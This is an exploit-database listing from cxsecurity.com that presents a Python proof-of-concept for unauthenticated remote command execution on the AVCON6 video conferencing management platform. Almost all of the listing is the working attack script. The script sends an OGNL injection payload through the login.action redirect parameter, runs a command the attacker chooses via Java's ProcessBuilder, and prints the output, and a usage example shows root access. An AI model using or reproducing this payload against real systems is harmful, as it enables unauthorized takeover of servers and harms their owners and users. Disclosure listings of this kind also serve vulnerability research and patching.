AVCON6 Systems Management Platform Remote Root

2019.09.11
Credit: Nassim Asrir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution # Date: 10/09/2018 # Exploit Author: Nassim Asrir # Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/ # CVE: N\A # Tested On: Windows 10(64bit) / 61.0b12 (64-bit) # Thanks to: Otmane Aarab # Example below: # python ./rce.py http://server:8080/ id # Testing Target: http://server:8080/ # uid=0(root) gid=0(root) # Vendor: http://www.epross.com/ # About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing # software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time. # I am not responsible for any wrong use. ###################################################################################################### #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = 'login.action?redirect:' payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).' payload += 'start(),%23b%3d%23a.getInputStream(),' payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),' payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d' payload += '.read(%23e),%23matt%3d%23context.' payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),' payload += '%23matt.getWriter().println(%23e),%23matt.' payload += 'getWriter().flush(),%23matt.getWriter()' payload += '.close()}' try: headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'} request = urllib2.Request(url+payload, headers=headers) page = urllib2.urlopen(request).read() except httplib.IncompleteRead, e: page = e.partial print(page) return page if __name__ == '__main__': import sys if len(sys.argv) != 3: print("[*] struts2_S2-045.py http://target/ id") else: print('[*] Avcon6-Preauh-Remote Command Execution') url = sys.argv[1] cmd = sys.argv[2] print("[*] Executed Command: %s\n" % cmd) print("[*] Target: %s\n" % url) exploit(url, cmd)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top